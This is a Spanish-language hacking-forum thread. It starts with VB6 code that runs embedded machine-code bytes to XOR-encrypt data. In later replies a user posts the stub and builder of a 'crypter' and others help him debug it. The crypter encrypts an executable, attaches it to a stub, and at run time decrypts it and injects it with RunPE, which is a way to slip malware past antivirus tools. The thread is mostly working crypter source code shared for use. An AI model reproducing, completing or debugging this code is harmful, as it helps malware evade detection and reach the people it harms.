comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

XOR encryption ASM

  • 5 Respuestas
  • 5349 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Expermicid

  • *
  • Underc0der
  • Mensajes: 457
  • Actividad:
    0%
  • Reputación 0
  • _-Expermicid-_
    • Ver Perfil
  • Skype: expermicid.xd
« en: Junio 18, 2012, 10:25:25 am »
Código: Visual Basic
  1. Private Declare Function CallWindowProc Lib "user32" Alias "CallWindowProcW" (ByVal ptrMC As Long, ByVal P1 As Long, ByVal P2 As Long, ByVal P3 As Long, ByVal P4 As Long) As Long
  2. Private MyByteXor(93) As Byte ' Byte array (hold the ASM ShellCode)
  3. Private ptrMC As Long 'Byte array Pointer Store Value
  4.  
  5. Public Function ASMXORString(Str As String, Password As String) As String
  6.   Call LeggiCodiceMasm32
  7.   Call CallWindowProc(ptrMC, StrPtr(Str), Len(Str), StrPtr(Password), Len(Password))
  8.         ASMXORString = Str
  9. End Function
  10.  
  11. Public Sub ASMXORByte(ByteA() As Byte, Password As String)
  12.   Call LeggiCodiceMasm32
  13.   Call CallWindowProc(ptrMC, VarPtr(ByteA(0)), UBound(ByteA), StrPtr(Password), Len(Password))
  14. End Sub
  15.  
  16.  
  17. Sub LeggiCodiceMasm32()
  18. MyByteXor(0) = 85
  19. MyByteXor(1) = 137
  20. MyByteXor(2) = 229
  21. MyByteXor(3) = 83
  22. MyByteXor(4) = 86
  23. MyByteXor(5) = 87
  24. MyByteXor(6) = 139
  25. MyByteXor(7) = 69
  26. MyByteXor(8) = 12
  27. MyByteXor(9) = 133
  28. MyByteXor(10) = 192
  29. MyByteXor(11) = 116
  30. MyByteXor(12) = 70
  31. MyByteXor(13) = 139
  32. MyByteXor(14) = 69
  33. MyByteXor(15) = 20
  34. MyByteXor(16) = 133
  35. MyByteXor(17) = 192
  36. MyByteXor(18) = 116
  37. MyByteXor(19) = 63
  38. MyByteXor(20) = 139
  39. MyByteXor(21) = 77
  40. MyByteXor(22) = 12
  41. MyByteXor(23) = 209
  42. MyByteXor(24) = 225
  43. MyByteXor(25) = 139
  44. MyByteXor(26) = 85
  45. MyByteXor(27) = 8
  46. MyByteXor(28) = 1
  47. MyByteXor(29) = 202
  48. MyByteXor(30) = 247
  49. MyByteXor(31) = 217
  50. MyByteXor(32) = 139
  51. MyByteXor(33) = 93
  52. MyByteXor(34) = 20
  53. MyByteXor(35) = 209
  54. MyByteXor(36) = 227
  55. MyByteXor(37) = 139
  56. MyByteXor(38) = 69
  57. MyByteXor(39) = 16
  58. MyByteXor(40) = 1
  59. MyByteXor(41) = 216
  60. MyByteXor(42) = 137
  61. MyByteXor(43) = 69
  62. MyByteXor(44) = 16
  63. MyByteXor(45) = 247
  64. MyByteXor(46) = 219
  65. MyByteXor(47) = 137
  66. MyByteXor(48) = 93
  67. MyByteXor(49) = 20
  68. MyByteXor(50) = 139
  69. MyByteXor(51) = 4
  70. MyByteXor(52) = 10
  71. MyByteXor(53) = 3
  72. MyByteXor(54) = 93
  73. MyByteXor(55) = 16
  74. MyByteXor(56) = 50
  75. MyByteXor(57) = 3
  76. MyByteXor(58) = 43
  77. MyByteXor(59) = 93
  78. MyByteXor(60) = 16
  79. MyByteXor(61) = 129
  80. MyByteXor(62) = 195
  81. MyByteXor(63) = 2
  82. MyByteXor(64) = 0
  83. MyByteXor(65) = 0
  84. MyByteXor(66) = 0
  85. MyByteXor(67) = 117
  86. MyByteXor(68) = 3
  87. MyByteXor(69) = 139
  88. MyByteXor(70) = 93
  89. MyByteXor(71) = 20
  90. MyByteXor(72) = 137
  91. MyByteXor(73) = 4
  92. MyByteXor(74) = 10
  93. MyByteXor(75) = 129
  94. MyByteXor(76) = 193
  95. MyByteXor(77) = 2
  96. MyByteXor(78) = 0
  97. MyByteXor(79) = 0
  98. MyByteXor(80) = 0
  99. MyByteXor(81) = 117
  100. MyByteXor(82) = 223
  101. MyByteXor(83) = 49
  102. MyByteXor(84) = 192
  103. MyByteXor(85) = 95
  104. MyByteXor(86) = 94
  105. MyByteXor(87) = 91
  106. MyByteXor(88) = 137
  107. MyByteXor(89) = 236
  108. MyByteXor(90) = 93
  109. MyByteXor(91) = 194
  110. MyByteXor(92) = 16
  111. MyByteXor(93) = 0
  112. ptrMC = VarPtr(MyByteXor(0))
  113.  
  114. End Sub

Fuente: OpenSc
« Última modificación: Mayo 12, 2014, 03:36:40 pm por Expermicid »

Desconectado mcr_bkn

  • *
  • Underc0der
  • Mensajes: 22
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #1 en: Diciembre 05, 2012, 08:20:54 pm »
Estuve chequeando esta encriptación y no la puedo echar a correr... a ver si me pueden ayudar... estoy haciendo un crypter en vb6, la función de encriptación es "ASMXORString" esta misma se usa en el stub??? para descriptar... me sale error 9... al encriptar una bolita... a ver si me pueden ayudar...
Nunca consideres el estudio como una obligación, sino como una oportunidad para penetrar en el bello y maravilloso mundo del saber.

Desconectado k0ws

  • *
  • Underc0der
  • Mensajes: 145
  • Actividad:
    0%
  • Reputación 0
  • I'm Back
    • Ver Perfil
  • Skype: k0wsit0
« Respuesta #2 en: Diciembre 06, 2012, 11:44:30 am »
Tal vez podrias poner aqui el code de tu stub para asi poder darle una ojeada, pero a primera vista, parece ser que no pasas bien los parametros.

-Saludos-

Desconectado mcr_bkn

  • *
  • Underc0der
  • Mensajes: 22
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #3 en: Diciembre 06, 2012, 03:59:20 pm »
Bro gracias por la ayuda!! el runpe es de pink y los códigos son los siguientes:


 stub:

Código: You are not allowed to view links. Register or Login
Dim Yopo As String, Clave As String, Jclas As New Class1, Archivo As String, dattos() As Byte



Sub Main()

Open App.Path & "\" & App.EXEName & ".exe" For Binary As #1
Yopo = Space(LOF(1))
Get #1, , Yopo
Close #1

Clave = Split(Yopo, "~<{symphonatik}>~")(1)
Archivo = Split(Yopo, "~<{symphonatik}>~")(2)

Archivo = Jclas.DecryptString(Archivo, Clave)

dattos() = StrConv(Archivo, vbFromUnicode)
Call RunPE(App.Path & "\" & App.EXEName & ".exe", dattos())

End Sub




Builder:

Código: You are not allowed to view links. Register or Login
Dim origenStub As String

Public Function sRndStr(sLen As Long) As String
'Autor: Slek
'Propósito: Generar una Str Aleatoria
'v.1 Indetectables.net
Dim lPos As Long, i As Long
Const Str As String = "$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz"

Randomize Timer
For i = 1 To sLen
lPos = Rnd * 14373 Mod Len(Str)

sRndStr = sRndStr & Mid(Str, lPos + 1, 1)
Next i
End Function
Private Sub CEncriptar_Click()
Dim Origen As String, Destino As String, Cifrado As String, hatsune() As Byte, miku As String, archivo As String, Jclas As New Class1

With CD
.DialogTitle = "Archivo a encriptar..."
.Filter = "todos los archivos|*.*"
.ShowOpen
End With
If CD.Filename <> vbNullString Then
Origen = CD.Filename
End If

With CD
.DialogTitle = "Donde guardaras el archivo..."
.Filter = "Archivo ejecutable|*.exe"
.ShowSave
End With
If CD.Filename <> vbNullString Then
Destino = CD.Filename
End If

Cifrado = sRndStr(49)


Open Origen For Binary As #1
archivo = Space(LOF(1))
Get #1, , archivo
Close #1

archivo = Jclas.EncryptString(archivo, Cifrado)


Open origenStub For Binary As #1
miku = Space(LOF(1))
Get #1, , miku
Close #1

Open Destino For Binary As #1
Put #1, , miku
Put #1, , "~<{symphonatik}>~"
Put #1, , Cifrado
Put #1, , "~<{symphonatik}>~"
Put #1, , archivo
Close #1

MsgBox "que lo disfrutes!!!"

End Sub

Public Sub CSelStub_Click()

With CD
.DialogTitle = "Selecciona el stub..."
.Filter = "ejecutables|*.exe"
.ShowOpen
End With
If CD.Filename <> vbNullString Then
origenStub = CD.Filename
End If

CEncriptar.Enabled = True
End Sub
Nunca consideres el estudio como una obligación, sino como una oportunidad para penetrar en el bello y maravilloso mundo del saber.

Desconectado mcr_bkn

  • *
  • Underc0der
  • Mensajes: 22
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #4 en: Diciembre 12, 2012, 12:08:52 am »
nadie sabe que pasa??
Nunca consideres el estudio como una obligación, sino como una oportunidad para penetrar en el bello y maravilloso mundo del saber.

Desconectado k0ws

  • *
  • Underc0der
  • Mensajes: 145
  • Actividad:
    0%
  • Reputación 0
  • I'm Back
    • Ver Perfil
  • Skype: k0wsit0
« Respuesta #5 en: Diciembre 13, 2012, 10:04:49 pm »
Haz el split de otra manera, esa siempre me dio problemas.

-Saludos-

 

¿Te gustó el post? COMPARTILO!